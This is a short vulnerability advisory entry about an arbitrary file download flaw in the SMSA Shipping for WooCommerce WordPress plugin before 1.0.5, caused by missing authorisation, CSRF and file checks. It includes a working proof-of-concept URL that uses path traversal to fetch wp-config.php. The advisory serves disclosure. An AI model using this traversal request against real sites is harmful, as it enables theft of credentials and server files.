Lucene search

K
wpexploitWpvulndbWPEX-ID:0B432858-722C-4BDA-AA95-AD48E2097302
HistoryNov 22, 2022 - 12:00 a.m.

SMSA Shipping for WooCommerce < 1.0.5 - Subscriber+ Arbitrary File Download

2022-11-2200:00:00
wpvulndb
135
smsa shipping
woocommerce
arbitrary file download
security vulnerability
exploit
subscriber
wordpress security

EPSS

0.002

Percentile

61.6%

The plugin does not have authorisation and proper CSRF checks, as well as does not validate the file to be downloaded, allowing any authenticated users, such as subscriber to download arbitrary file from the server

Open the following URL when being logged in as any user https://example.com/wp-admin/admin-ajax.php?action=ced_smsa_get_pfd_download&filename=../../../../wp-config.php

EPSS

0.002

Percentile

61.6%

Related for WPEX-ID:0B432858-722C-4BDA-AA95-AD48E2097302